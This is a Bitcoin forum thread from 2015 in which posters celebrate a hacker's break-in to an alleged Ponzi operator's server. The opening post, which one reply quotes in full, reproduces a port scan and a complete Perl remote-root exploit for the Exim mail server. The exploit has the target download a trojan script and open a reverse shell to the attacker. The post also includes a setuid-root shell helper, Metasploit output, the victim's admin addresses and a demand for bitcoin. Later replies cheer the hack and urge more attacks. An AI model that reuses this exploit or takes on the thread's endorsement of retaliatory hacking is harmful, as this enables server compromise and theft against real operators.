EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 06:06:58 AM |
|
Look at this: hehe i told u dont fucking play with me ! where is u "ponzi" now ? some infos to public http://pastebin.com/VGcARfGeORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 26/tcp closed rsftp 53/tcp open tcpwrapped 80/tcp open http nginx 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 443/tcp open http nginx 465/tcp open ssl/smtp Exim smtpd 4.85 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 3306/tcp open mysql MySQL (unauthorized) 8080/tcp closed http-proxy nice 465/tcp open ssl/smtp Exim smtpd 4.85 code of exploit in perl: #Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; }
$|=1;
$trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');
while(<$sock>) { print; if ($_ =~ /220 /) { last;} }
print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} }
if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; }
$vv .= "(" . $helohost . ")";
$from = "root\@local.com"; $to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256; $logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16); $logbuffer_size -= 3;
for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; }
$hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; }
$v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; }
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n";
while(1){}; msf core... root@kali:~# msfconsole [*] Starting the Metasploit Framework console...\ ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]] + -- --=[ 1389 exploits - 788 auxiliary - 223 post ] + -- --=[ 356 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim [!] Database not connected or cache not built, using slow search
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf > some screenshot some problem if u have i cant windraw all here admin@money10.netadmin@14daily.comadmin@bitcoinfield.netadmin@profit12.comadmin@lucrebit.comwellcome speedy1987 in me worlddont sarching me i have 20 firewole 10 nat and 5 vps hahah. now u all cant windraw u monet but if u dont have skills... this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !pozdrowienia ! polish elite hacker team
|
|
|
|
Dotakels
|
|
May 05, 2015, 06:16:41 AM |
|
Look at this: hehe i told u dont fucking play with me ! where is u "ponzi" now ? some infos to public http://pastebin.com/VGcARfGeORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 26/tcp closed rsftp 53/tcp open tcpwrapped 80/tcp open http nginx 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 443/tcp open http nginx 465/tcp open ssl/smtp Exim smtpd 4.85 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 3306/tcp open mysql MySQL (unauthorized) 8080/tcp closed http-proxy nice 465/tcp open ssl/smtp Exim smtpd 4.85 code of exploit in perl: #Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; }
$|=1;
$trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');
while(<$sock>) { print; if ($_ =~ /220 /) { last;} }
print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} }
if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; }
$vv .= "(" . $helohost . ")";
$from = "root\@local.com"; $to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256; $logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16); $logbuffer_size -= 3;
for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; }
$hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; }
$v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; }
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n";
while(1){}; msf core... root@kali:~# msfconsole [*] Starting the Metasploit Framework console...\ ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]] + -- --=[ 1389 exploits - 788 auxiliary - 223 post ] + -- --=[ 356 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim [!] Database not connected or cache not built, using slow search
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf > some screenshot some problem if u have i cant windraw all here admin@money10.netadmin@14daily.comadmin@bitcoinfield.netadmin@profit12.comadmin@lucrebit.comwellcome speedy1987 in me worlddont sarching me i have 20 firewole 10 nat and 5 vps hahah. now u all cant windraw u monet but if u dont have skills... this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !pozdrowienia ! polish elite hacker team Good job. Hackers should do that. Always so that theres no people will scam but. The hackers get back the scammers scammed to its owner? I think he should do that so that being hacker will have a sense.
|
|
|
|
louise123
|
|
May 05, 2015, 07:47:24 AM |
|
Serves him right. Don't do to others, what you do not want done to you. Karma is a b*tch isn't it
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 07:54:33 AM |
|
Serves him right. Don't do to others, what you do not want done to you. Karma is a b*tch isn't it Yeah, When i heard that he was hacked I thought yeshh, finally he gets what he deserves!
|
|
|
|
gogxmagog
Legendary
Offline
Activity: 1456
Merit: 1010
Ad maiora!
|
|
May 05, 2015, 07:57:37 AM |
|
Awesome job 5m4ru1 this made my day! I hope you can find time to nail more of these scammers, check the securities section for plenty of deserving victims! The amount of scammers in Bitcoin, you could be very busy, but very very rich too! Please do make a habit of this LOL
|
|
|
|
louise123
|
|
May 05, 2015, 08:10:15 AM |
|
Awesome job 5m4ru1 this made my day! I hope you can find time to nail more of these scammers, check the securities section for plenty of deserving victims! The amount of scammers in Bitcoin, you could be very busy, but very very rich too! Please do make a habit of this LOL
Yeah, definitely make a habit out of this. And if you don't mind, I look like to suggest that your next target be Mark Karpeles Return those coins to the Goxxed LOL!
|
|
|
|
favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
|
|
May 05, 2015, 08:27:35 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
|
|
|
|
Nick Markus
Newbie
Offline
Activity: 42
Merit: 0
|
|
May 05, 2015, 08:33:19 AM |
|
Hahah! Nice. That is what he deserved.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 08:35:49 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker.
|
|
|
|
Dotakels
|
|
May 05, 2015, 10:21:56 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 10:24:52 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it. I dont know if he keeps it, i think he keeps 0.5 btc and rest give to the investors.
|
|
|
|
favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
|
|
May 05, 2015, 10:28:02 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it. I dont know if he keeps it, i think he keeps 0.5 btc and rest give to the investors. He should've just donated it. Gamblers got what they deserve for supporting an obvious scam
|
|
|
|
Dotakels
|
|
May 05, 2015, 10:31:07 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it. I dont know if he keeps it, i think he keeps 0.5 btc and rest give to the investors. He buy bitcoins using the scammers money and share it to investor?. So you means this hacker is using bitcoin?.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 10:41:39 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it. I dont know if he keeps it, i think he keeps 0.5 btc and rest give to the investors. He buy bitcoins using the scammers money and share it to investor?. So you means this hacker is using bitcoin?. I really don't know what he is going to do with these bitcoins. I think it is good that a scammer get hacked.
|
|
|
|
crazyivan
Legendary
Offline
Activity: 1652
Merit: 1007
DMD Diamond Making Money 4+ years! Join us!
|
|
May 05, 2015, 12:11:34 PM |
|
Very nice. Scammer got what he deserved.
KARMA it is.
|
|
|
|
jdebunt
Legendary
Offline
Activity: 1596
Merit: 1010
|
|
May 05, 2015, 12:31:24 PM |
|
*standing belly clap* I like your approach
|
|
|
|
alesx.onfire
|
|
May 05, 2015, 05:16:21 PM |
|
i don't understand the history
Who was scamming?
|
|
|
|
nor9865
|
|
May 05, 2015, 07:04:08 PM |
|
Who was the original scammer? Also. To scam a scammer is ok? Wow. I know the logic behind it is true, but damn. A scammer is a scammer.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 07:05:48 PM |
|
Who was the original scammer? Also. To scam a scammer is ok? Wow. I know the logic behind it is true, but damn. A scammer is a scammer.
The scammer is hacked, not scammed. It is up to the hacker if he pays evryone his investment.
|
|
|
|
Dotakels
|
|
May 05, 2015, 07:17:08 PM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made a investment scam website. he made over 3000$ from scam, but now he has been hacked and the scammed money is now in property of the hacker. Did he gave the charities or the someone who was scammed by this people? Or he kep it up as his money? Its better to share it. I dont know if he keeps it, i think he keeps 0.5 btc and rest give to the investors. He buy bitcoins using the scammers money and share it to investor?. So you means this hacker is using bitcoin?. I really don't know what he is going to do with these bitcoins. I think it is good that a scammer get hacked. But is better to share it because he steal it even if he steal it from the person who also steal that money. Its ok to steal money to a scammer but share it so that being scammer will have a sense.
|
|
|
|
|